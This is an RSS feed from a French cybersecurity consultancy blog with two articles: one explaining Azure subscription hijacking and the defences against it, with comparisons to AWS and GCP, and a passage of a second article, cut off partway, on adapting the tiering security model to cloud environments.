<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Cloud - RiskInsight</title>
	<atom:link href="https://www.riskinsight-wavestone.com/tag/cloud/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.riskinsight-wavestone.com/tag/cloud/</link>
	<description>Le blog cybersécurité des consultants Wavestone</description>
	<lastBuildDate>Tue, 07 Apr 2026 12:45:52 +0000</lastBuildDate>
	<language>fr-FR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/Blogs-2024_RI-39x39.png</url>
	<title>Cloud - RiskInsight</title>
	<link>https://www.riskinsight-wavestone.com/tag/cloud/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Le subscription hijacking sur Microsoft Azure </title>
		<link>https://www.riskinsight-wavestone.com/2026/03/le-subscription-hijacking-sur-microsoft-azure/</link>
					<comments>https://www.riskinsight-wavestone.com/2026/03/le-subscription-hijacking-sur-microsoft-azure/#respond</comments>
		
		<dc:creator><![CDATA[Diane Krychowski]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 16:38:54 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Azure]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Digital privacy]]></category>
		<category><![CDATA[Gestion des risques]]></category>
		<category><![CDATA[Hijacking]]></category>
		<category><![CDATA[Risk management]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=29452</guid>

					<description><![CDATA[<p>Le subscription hijacking est une attaque cloud identifiée d’abord sur Microsoft Azure : elle consiste pour un attaquant à réussir à transférer une subscription Azure de son organisation Azure d’origine vers une organisation sous contrôle malveillant. Cette attaque permet à l’attaquant de prendre le contrôle total sur la subscription et son contenu, et...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2026/03/le-subscription-hijacking-sur-microsoft-azure/">Le subscription hijacking sur Microsoft Azure </a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;"><span style="color: #000000;">Le <i>subscription hijacking</i> est une attaque cloud identifiée d’abord sur Microsoft Azure : elle consiste pour un attaquant à réussir à transférer une subscription Azure de son organisation Azure d’origine vers une organisation sous contrôle malveillant. Cette attaque permet à l’attaquant de prendre le contrôle total sur la subscription et son contenu, et même de <b>continuer à facturer</b> l’organisation d’origine pour l’utilisation qu’il fait de la subscription volée. </span></p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;"><span style="color: #000000;">Rappel de ce qu’est une subscription Azure</span></h1>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Une subscription Azure (en français abonnement) est un conteneur de ressources et de services cloud associé à un tenant, qui permet de gérer la facturation, les accès et le déploiement des ressources Azure.</span></p>
<p style="text-align: center;"><span style="color: #000000;" data-wp-editing="1"><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-29483" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image1.png" alt="" width="863" height="686" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image1.png 863w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image1-240x191.png 240w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image1-49x39.png 49w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image1-768x610.png 768w" sizes="(max-width: 863px) 100vw, 863px" /></span><em><span style="color: #000000;">Architecture des ressources sur Azure</span></em></p>
<p> </p>
<h1 style="text-align: justify;"><span style="color: #000000;">Fonctionnement de l’attaque </span></h1>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"><span style="color: #000000;">Sur Microsoft Azure, on considère la situation de départ suivante : </span></p>
<ul style="text-align: justify;">
<li><span style="color: #000000;">Il y a une organisation légitime (tenant victime), qui contient ou non une subscription. </span></li>
<li><span style="color: #000000;">Il y a une organisation malveillante (tenant de l’attaquant) sous le contrôle d’un attaquant. </span></li>
</ul>
<p style="text-align: justify;"><span style="color: #000000;">L’attaque suit alors les 4 étapes suivantes : </span></p>
<p><img decoding="async" class="aligncenter wp-image-29476 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Diapositive5-1-e1774449444360.jpg" alt="" width="780" height="560" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Diapositive5-1-e1774449444360.jpg 780w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Diapositive5-1-e1774449444360-266x191.jpg 266w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Diapositive5-1-e1774449444360-54x39.jpg 54w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Diapositive5-1-e1774449444360-768x551.jpg 768w" sizes="(max-width: 780px) 100vw, 780px" /></p>
<p style="text-align: center;"><em><span style="color: #000000;">Etapes de l’attaque Azure</span></em></p>
<p> </p>
<ol style="text-align: justify;">
<li style="text-align: justify;"><span style="color: #000000;">L’attaquant doit être présent dans les deux organisations : Il compromet donc un administrateur interne au tenant victime pour faire inviter son compte externe dans le tenant, ou bien il convainc un administrateur non compromis de se faire inviter, sous un prétexte quelconque. Dans les deux cas, l’administrateur l’invite dans le tenant victime. </span></li>
<li style="text-align: justify;"><span style="color: #000000;">L’attaquant prend pour cible une subscription<b> existante</b> ou bien en crée une<b> nouvelle lui-même</b> (ce qui nécessite des permissions), associé à un compte de facturation existant. </span></li>
<li style="text-align: justify;"><span style="color: #000000;">L’attaquant obtient le rôle <b>Owner</b> sur la subscription visée. S’il l’a créée lui-même, il l’est déjà par défaut, sinon il doit le recevoir d’un administrateur. </span></li>
<li style="text-align: justify;"><span style="color: #000000;">L’attaquant effectue le transfert de la subscription de l’organisation de départ à l’organisation d’arrivée. </span></li>
</ol>
<p style="text-align: justify;"><span style="color: #000000;">La subscription est désormais sous le <b>contrôle complet </b>de l’organisation de l’attaquant et peut facturer l’ancien compte de facturation.  </span></p>
<p> </p>
<h1 style="text-align: justify;"><span style="color: #000000;">Pourquoi cette attaque est dangereuse ? </span></h1>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Cette attaque est potentiellement très dangereuse car elle est <b>instantanée</b> à réaliser si les conditions sont réunies, donne à l’attaquant un contrôle complet sur la ressource et son éventuel contenu, et est <b>irréversible</b> sans intervention du support. </span></p>
<p style="text-align: justify;"><span style="color: #000000;">Une attaque instantanée </span></p>
<p style="text-align: justify;"><span style="color: #000000;">Par défaut, n’importe quel utilisateur <b>Owner</b> sur une subscription Azure, qui est également présent dans un autre tenant, peut effectuer le transfert sans restriction. </span></p>
<p style="text-align: justify;"><span style="color: #000000;">Des conséquences multiples et potentiellement irréversibles </span></p>
<p style="text-align: justify;"><span style="color: #000000;">La subscription passe sous le contrôle du tenant malveillant qui l’a récupérée. Il peut donc : </span></p>
<ul>
<li><span style="color: #000000;">Avoir le contrôle total dessus tandis que l’utilisateur d’origine n’y a plus accès </span></li>
<li><span style="color: #000000;">En extraire toutes les ressources ou informations </span></li>
<li><span style="color: #000000;">L’utiliser en faisant facturer l’utilisation à l’ancien moyen de facturation appartenant au propriétaire légitime </span></li>
</ul>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;"><strong>Note :</strong> Un intérêt du <i>subscription hijacking</i> est d’amener les ressources dans son propre environnement hors de contrôle du propriétaire légitime, pour s’en servir à son propre compte ou pour facturer des nouvelles utilisations à l’ancien propriétaire. Cependant, un simple transfert sans utilisation entraîne déjà des conséquences importantes : l’utilisateur aura perdu sa subscription, et donc aura perdu toutes les ressources, mais également la <b>structure</b> (rôles, assignations, règles), qui peut être très longue à reconstruire. </span></p>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Si le propriétaire légitime peut bloquer la facturation une fois qu’il réalise ce qu’il se passe, il n’y a en revanche pas de moyen de récupérer la subscription si l’attaquant a retiré tous les anciens <b>Owner</b> de celle-ci. La seule alternative devient alors de se tourner vers le support de Microsoft. </span></p>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">L’article suivant de <b>Derk van der Woude</b> décrit un cas de minage de cryptomonnaies effectué avec des subscriptions volées et facturé à l’ancien propriétaire : </span></p>
<p style="text-align: justify;"><span style="color: #000000;"><a style="color: #000000;" href="https://derkvanderwoude.medium.com/azure-subscription-hijacking-and-cryptomining-86c2ac018983">https://derkvanderwoude.medium.com/azure-subscription-hijacking-and-cryptomining-86c2ac018983</a> </span></p>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0}"> </span></p>
<h1 style="text-align: justify;"><span style="color: #000000;">Comment s’en protéger ? </span></h1>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Pour se protéger d’un transfert illégitime de subscription, il existe des mesures préventives que l’on peut citer pour prévenir chaque étape de l’attaque : </span></p>
<p> </p>
<h2 style="text-align: justify;"><span style="color: #000000;">Mesures préventives </span></h2>
<p> </p>
<ol>
<li><span style="color: #000000;"><strong>Accès de l’attaquant aux ressources : politiques d’accès conditionnelles</strong></span></li>
</ol>
<p><span style="color: #000000;">Les politiques d’accès conditionnel basées sur le risque permettent de renforcer automatiquement la sécurité en adaptant les contrôles selon le niveau de risque détecté lors d’une connexion ou associé à un utilisateur. Elles permettent par exemple de bloquer les accès suspects ou d’imposer une authentification multi facteur (MFA). Ainsi, l’accès d’un invité suspect pourrait être bloqué. </span></p>
<p><span style="color: #000000;"><b>      2. Montée en privilège/obtention du rôle Owner : </b><b>gestion des identités privilégiées</b> </span></p>
<p><span style="color: #000000;">La gestion des identités privilégiées (Privileged Identity Management, PIM)​ permet d’accorder des rôles à privilèges élevés seulement quand cela est nécessaire, via une élévation temporaire, approuvée et justifiée. Il réduit ainsi les risques liés aux permissions excessives grâce au contrôle, au suivi et aux notifications d’activation. </span></p>
<p><span style="color: #000000;"><b>      3. Transfert de la subscription : </b><b>politique de subscription (subscription policy)</b> </span></p>
<p style="text-align: justify;"><span style="color: #000000;">Une <i>subscription policy</i> permet de bloquer le transfert d’une subscription Azure vers ou hors du tenant afin d’éviter les détournements. Elle s’implémente via Azure Policy en définissant puis assignant une règle qui restreint les actions de transfert, avec des revues régulières pour garantir son efficacité. Elle s’applique à toutes les subscriptions se trouvant dans son scope d’assignation. </span></p>
<p> </p>
<h2 style="text-align: justify;"><span style="color: #000000;">Solutions de détection </span></h2>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Certaines solutions permettent de détecter cette attaque sur Microsoft Azure : </span></p>
<ul>
<li><span style="color: #000000;"><b>UEBA (Sentinel) :</b> détecte les comportements anormaux (connexions inhabituelles, accès sensibles, modifications inattendues). Cela permet d’identifier rapidement un compte compromis avant qu’il ne puisse détourner une subscription. </span></li>
<li><span style="color: #000000;"><b>Privileged Identity Management (PIM)</b><b>​ </b>: contrôle les élévations de privilèges et peut déclencher des alertes en cas d’activation d’un rôle privilégié. </span></li>
<li><span style="color: #000000;"><b>Alerte Sentinel personnalisée </b>: Peut surveiller spécifiquement les événements indiquant un transfert de subscription. La règle analyse régulièrement les logs <i>AzureActivity</i> et déclenche immédiatement une alerte lorsqu’une opération suspecte comme le déplacement d’une subscription est détectée. </span></li>
</ul>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:720}"> </span></p>
<h2 style="text-align: justify;"><span style="color: #000000;">Stratégie de résilience </span></h2>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">La stratégie de résilience à mettre en place est une sauvegarde (backup) des ressources qui permet de les restaurer en cas de détournement effectif de la subscription. </span></p>
<ol>
<li><span style="color: #000000;">Isoler les sauvegardes Azure Backup dans une subscription dédiée réservé aux backups avec des règles de sécurité strictes </span></li>
<li><span style="color: #000000;">Protéger les sauvegardes : activer le soft delete (pas de suppression définitive immédiate), la suppression réversible, l’immutabilité (empêche la modification ou la suppression pendant une période), des verrous anti-suppression </span></li>
<li><span style="color: #000000;">Multiplier les copies, éventuellement vers un autre tenant </span></li>
<li><span style="color: #000000;">Sauvegarder également la gouvernance (configurations Entra ID via Microsoft 365 DSC, configuration d’infrastructure avec Terraform) </span></li>
<li><span style="color: #000000;">Automatiser la reconstruction avec l’infrastructure-as-code (Blueprints, ARM, Terraform) </span></li>
<li><span style="color: #000000;">Tester régulièrement les backups </span></li>
</ol>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:720}"> </span></p>
<h1 style="text-align: justify;"><span style="color: #000000;">Réaction à l’attaque </span></h1>
<p style="text-align: justify;"><span style="color: #000000;">Subir cette attaque revient à perdre sa subscription Azure. Auquel cas, les options sont limitées. Il faut très rapidement : </span></p>
<ul>
<li><span style="color: #000000;">Bloquer les accès de l’attaquant et révoquer les éventuels secrets compromis dans l’attaque </span></li>
<li><span style="color: #000000;">Contacter le support Microsoft Billing pour bloquer la facturation </span></li>
<li><span style="color: #000000;">Contacter le support Microsoft (technique/Azure) pour tenter de récupérer la subscription </span></li>
</ul>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0}"> </span></p>
<h1 style="text-align: justify;"><span style="color: #000000;">Et sur les autres providers ? (AWS et GCP) </span></h1>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Une fois cette attaque identifiée sur Azure, la question de son existence (ou d’un équivalent) sur AWS et GCP se pose alors. Le concept de subscription n’existe pas en tant que tel sur ces deux fournisseurs cloud, cependant, des unités hiérarchiques équivalentes jouent le même rôle. S’il était possible de les migrer vers une autre organisation AWS et GCP de manière illégitime, ce serait un équivalent du <i>subscription hijacking</i> sur ces fournisseurs.  </span></p>
<p> </p>
<h2 style="text-align: justify;"><span style="color: #000000;">AWS : un équivalent possible mais avec des conditions distinctes </span></h2>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Sur AWS, l’équivalent hiérarchique de la subscription est le compte AWS : un compte AWS, présent dans une organisation, contient des utilisateurs IAM, des ressources et c’est à son niveau que la facturation est gérée, <b>si elle n’est pas consolidée par le compte de gestion.</b> </span></p>
<p style="text-align: justify;"><span style="color: #000000;">Le but d’un attaquant serait donc ici de faire migrer ce compte AWS vers une autre organisation. </span></p>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0}"> </span></p>
<h3 style="text-align: justify;"><span style="color: #000000;">Chemin à suivre </span></h3>
<p style="text-align: justify;"><span style="color: #000000;">Le chemin à suivre pour effectuer la migration est le suivant : </span></p>
<p style="text-align: center;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0}"><img decoding="async" class="aligncenter size-full wp-image-29505" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image8.png" alt="" width="960" height="498" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image8.png 960w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image8-368x191.png 368w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image8-71x37.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image8-768x398.png 768w" sizes="(max-width: 960px) 100vw, 960px" /><em>Etapes de l&rsquo;attaques AWS </em></span></p>
<p style="text-align: justify;"><span style="color: #000000;">Un compte AWS contient : </span></p>
<ul>
<li><span style="color: #000000;">Un utilisateur root, unique, qui dispose de tous les droits sur le compte </span></li>
<li><span style="color: #000000;">Des utilisateurs IAM disposant de droits IAM attribués</span></li>
</ul>
<p style="text-align: justify;"><span style="color: #000000;">Dès lors, deux stratégies sont envisageables pour l’attaquant : parvenir à compromettre le root (auquel cas il peut effectuer toute action) ou réussir à monter en privilèges sur un utilisateur IAM classique. Cependant, l’approbation du root reste requise pour l’étape 1 (il peut par exemple avoir été manipulé pour effectuer cette action). De plus, si des guardrails ou des stratégies de contrôle des services (Service Control Policies) sont appliqués, le compte root doit toujours valider l’opération. Par conséquent, un utilisateur IAM, même avec des droits élevés, ne peut pas toujours migrer un compte de manière autonome. </span></p>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0}"> </span></p>
<h3 style="text-align: justify;"><span style="color: #000000;">Des conséquences similaires à l’attaque Azure ? </span></h3>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Il est établi que sur Azure, le transfert de la subscription entraînait une perte de contrôle totale sur celui-ci. Ici, sur AWS, deux nuances sont à introduire : </span></p>
<ul>
<li><span style="color: #000000;">D’abord, comme le montre le schéma précédent, la facturation doit impérativement être changée (vers un mode de facturation indépendant) pour permettre la migration du compte sur une autre organisation, ce qui élimine le risque de se voir facturer des services par l’attaquant <b>après</b> la migration</span></li>
<li><span style="color: #000000;">Ensuite, dans le cas théorique où c’est un utilisateur IAM non-root qui a réalisé la migration du compte (en ayant recueilli toutes les permissions nécessaires), alors cet utilisateur n’a pas un contrôle total sur ce compte, même en le laissant indépendant (standalone), ou en le faisant rejoindre une organisation sous son contrôle. Les comptes AWS ont en effet une forte indépendance, et le fait d’avoir un compte AWS dans son organisation ne permet pas d’en faire ce que l’on souhaite (accéder à certaines ressources, le supprimer) si l’on ne dispose pas du root</span></li>
</ul>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:360}"> </span></p>
<h3 style="text-align: justify;"><span style="color: #000000;">Conclusion </span></h3>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Si l’attaque semble théoriquement possible sur AWS, elle nécessite plus de conditions et entraîne moins de conséquences négatives définitives que sur Azure. En définitive, le seul moyen de prendre le contrôle total d’un compte AWS reste de disposer de son root. </span></p>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0}"> </span></p>
<h2 style="text-align: justify;"><span style="color: #000000;">GCP : un équivalent possible mais plus difficile à réaliser </span></h2>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Sur GCP, l’architecture est plus proche d’Azure. L’équivalent de la subscription Azure est le projet GCP. Ici, le but de l’attaquant serait donc de faire migrer un projet d’une organisation GCP à une autre.  </span></p>
<p> </p>
<h3 style="text-align: justify;"><span style="color: #000000;">Chemin à suivre </span></h3>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Les étapes à suivre pour effectuer la migration sont les suivantes : </span></p>
<p style="text-align: justify;"><span style="color: #000000;">  <img loading="lazy" decoding="async" class="aligncenter size-full wp-image-29489" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image3.png" alt="" width="863" height="614" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image3.png 863w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image3-268x191.png 268w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image3-55x39.png 55w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image3-768x546.png 768w" sizes="auto, (max-width: 863px) 100vw, 863px" /></span></p>
<p style="text-align: center;"><em><span style="color: #000000;">Etapes de l’attaque GCP </span></em></p>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0}"> </span></p>
<h3 style="text-align: justify;"><span style="color: #000000;">Des conséquences similaires à l’attaque Azure ? </span></h3>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Les conséquences en cas de migration de projet GCP sont les mêmes que pour une subscription Azure : une perte de contrôle totale sur l’élément, et le risque de se voir facturer une utilisation de l’attaquant si la facturation n’a pas été modifiée. </span></p>
<p> </p>
<h3 style="text-align: justify;"><span style="color: #000000;">Conclusion </span></h3>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Un détournement de ressources similaire au <i>subscription hijacking </i>visant Microsoft Azure est donc théoriquement possible sur GCP. Les conditions plus strictes qui sont nécessaires rendent cependant ce cas moins probable, mais il doit être considéré. </span></p>
<p style="text-align: justify;"><span style="color: #000000;">Résumé des conséquences </span></p>
<p style="text-align: justify;"><span style="color: #000000;">  <img loading="lazy" decoding="async" class="aligncenter size-full wp-image-29499" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image11.png" alt="" width="992" height="498" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image11.png 992w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image11-380x191.png 380w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image11-71x36.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/03/Image11-768x386.png 768w" sizes="auto, (max-width: 992px) 100vw, 992px" /></span></p>
<p style="text-align: center;"><em><span style="color: #000000;">Résumé des conséquences</span></em></p>
<p> </p>
<h1 style="text-align: justify;"><span style="color: #000000;">Conclusion </span></h1>
<p> </p>
<p style="text-align: justify;"><span style="color: #000000;">Le <i>subscription hijacking</i> doit donc être considéré comme une attaque d’importance aux conséquences graves et à fort impact pour les organisations ou entreprises touchées. Protéger les unités hiérarchiques gérant la facturation et les ressources contre tout déplacement ou migration illégitime (les mesures vont varier suivant le fournisseur cloud visé), et prévoir des processus de remédiation et de sauvegarde en cas de perte est crucial pour la sécurité d’une organisation. </span></p>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0}"> </span></p>
<p style="text-align: justify;"><span style="color: #000000;" data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0}"> </span></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2026/03/le-subscription-hijacking-sur-microsoft-azure/">Le subscription hijacking sur Microsoft Azure </a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2026/03/le-subscription-hijacking-sur-microsoft-azure/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Sécurité orientée cloud : Adaptation à une nouvelle réalité</title>
		<link>https://www.riskinsight-wavestone.com/2026/01/securite-orientee-cloud-adaptation-a-une-nouvelle-realite/</link>
					<comments>https://www.riskinsight-wavestone.com/2026/01/securite-orientee-cloud-adaptation-a-une-nouvelle-realite/#respond</comments>
		
		<dc:creator><![CDATA[Gautier PLANTE]]></dc:creator>
		<pubDate>Wed, 28 Jan 2026 09:08:21 +0000</pubDate>
				<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[ABAC]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Azure]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[Coeur de confiance]]></category>
		<category><![CDATA[Coeur de confiance Cloud]]></category>
		<category><![CDATA[Cybersécurité]]></category>
		<category><![CDATA[enterprise access model]]></category>
		<category><![CDATA[IAM Cloud]]></category>
		<category><![CDATA[Landing Zone]]></category>
		<category><![CDATA[REX RedTeam]]></category>
		<category><![CDATA[sécurité cloud]]></category>
		<category><![CDATA[Socle de sécurité cloud]]></category>
		<category><![CDATA[Tiering]]></category>
		<category><![CDATA[Trust Core Cloud]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=28879</guid>

					<description><![CDATA[<p>Les audits et missions de redteam menés par Wavestone ont mis en évidence un déséquilibre frappant entre la maturité des protections des infrastructures on-premise et celles déployées dans le cloud. Les infrastructures on-premise sont généralement bien identifiées, maîtrisées et protégées...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2026/01/securite-orientee-cloud-adaptation-a-une-nouvelle-realite/">Sécurité orientée cloud : Adaptation à une nouvelle réalité</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Les audits et missions de redteam menés par Wavestone ont mis en évidence un <strong>déséquilibre frappant entre la maturité des protections des infrastructures on-premise et celles déployées dans le cloud</strong>. Les infrastructures on-premise sont généralement bien identifiées, maîtrisées et protégées selon des standards éprouvés, tandis que leurs équivalents cloud restent souvent sous-évalués en termes de risques et par conséquent insuffisamment sécurisés.</p>
<p> </p>
<h2>Le principe de tiering préconisé sur les infrastructures on-premise est-il applicable au cloud ?</h2>
<h3>Évolution du modèle de sécurité</h3>
<p>Dans les environnements on-premise, en particulier <strong>Active Directory</strong>, la sécurité des infrastructures s&rsquo;appuie généralement sur une <strong>segmentation stricte en trois niveaux (T0, T1 et T2)</strong> permettant d’isoler les systèmes d’administration critiques (T0), les serveurs (T1) et les postes utilisateurs (T2) afin de limiter les risques de propagation.</p>
<p>Cette organisation hiérarchique et périmétrique est inhérente au monde AD et ne peut être directement appliquée au cloud pour ces deux principales raisons :</p>
<ul>
<li><strong>Les portails sont centralisés</strong>: une grande diversité d’administrateurs aux droits différents interagit avec la même URL.</li>
<li><strong>La frontière entre les niveaux d’administration est complexifiée</strong>: le principe de permission fine, par rôle (RBAC), par attribut de ressources (ABAC), selon certaines conditions (provenance, risque, conformité, méthode d’authentification…) permet de configurer des accès très précisément, mais complexifie et floute la vision globale des permissions.</li>
</ul>
<p>Afin de proposer une réponse à ce nouveau paradigme, Microsoft a publié son Enterprise Access Model (<span style="color: #333399;"><a style="color: #333399;" href="https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-access-model">décrit ici</a></span>), mettant en évidence 3 principaux plans : le <em>Control Plane</em>, <em>Management Plane</em> et <em>Data Plane</em>.</p>
<p>Ce modèle reprend la <strong>criticité « en cascade »</strong>, mais simplifiant :</p>
<ul>
<li>les 3 tiers en <strong>2 accès : administrateur vs utilisateur</strong><strong> </strong>;</li>
<li>les flux d’administration en accès au portail ;</li>
<li>la criticité des serveurs en les centralisant dans le <em>Data plane.</em></li>
</ul>
<p>Une illustration de l’ancien et du nouveau modèle :</p>
<figure id="attachment_28880" aria-describedby="caption-attachment-28880" style="width: 1669px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="size-full wp-image-28880" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/1-Du-modele-en-trois-tiers-a-la-complexite-du-cloud.png" alt="Du modèle en trois tiers à la complexité du cloud" width="1669" height="818" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/1-Du-modele-en-trois-tiers-a-la-complexite-du-cloud.png 1669w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/1-Du-modele-en-trois-tiers-a-la-complexite-du-cloud-390x191.png 390w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/1-Du-modele-en-trois-tiers-a-la-complexite-du-cloud-71x35.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/1-Du-modele-en-trois-tiers-a-la-complexite-du-cloud-768x376.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/1-Du-modele-en-trois-tiers-a-la-complexite-du-cloud-1536x753.png 1536w" sizes="auto, (max-width: 1669px) 100vw, 1669px" /><figcaption id="caption-attachment-28880" class="wp-caption-text"><em>Du modèle en trois tiers à la complexité du cloud</em></figcaption></figure>
<p> </p>
<p>Ce nouveau modèle met particulièrement en valeur 3 éléments :</p>
<ul>
<li>L’<strong>identité</strong> de l’utilisateur : accès privilégié vs accès utilisateur ;</li>
<li>La <strong>donnée</strong> et les services : au détriment des serveurs ;</li>
<li>La <strong>méthode d’accès</strong> aux portails web d’administration.</li>
</ul>
<p>L’inversion des importances entre « serveurs » et « portails web » abstrayant l’Active Directory est un changement radical.</p>
<p>Cependant, très peu (si ce n’est aucune) grande structure en est à ce niveau d’abandon de son SI « legacy », une grande partie sera dans un état transitoire où <strong>ce SI aura été virtualisé sur un Cloud</strong> afin de se séparer de ses datacenters, mais dont les modalités d’administration sont restées les mêmes.</p>
<p>Ces entreprises doivent donc traiter avec un <em>tiering model</em> désuet et un Enterprise Access Model décoléré des risques et besoins de sécurité actuels.</p>
<p>Pour la suite de cet article, nous prendrons comme exemple la société <strong>Tartampion</strong>, qui vient de terminer un programme <strong>Move-to-Cloud de 3 ans sur AWS</strong>. Le bilan est le suivant :</p>
<ul>
<li>Une Landing Zone a été créée, les applications déjà sur AWS y ont été intégrées</li>
<li>Les Data Center ont été fermés</li>
<li>Pris par le manque de temps et de moyens, une majeure partie du SI a été incorporé en lift and shift, incluant des solutions métiers, réseau, bastion et AD.</li>
</ul>
<p> </p>
<h3>Un SI hybride et virtualisé qui pose problème</h3>
<p>Selon l’EAM, les portails Azure et AWS sont affichés au même niveau (le <em>management plane</em>) au rang T1, sans autre forme de distinction. Or ces 2 environnements cloud sont à eux seuls le support de nombreux SI, utilisés par de multiples collaborateurs avec des niveaux de droits et d’impacts très variés.</p>
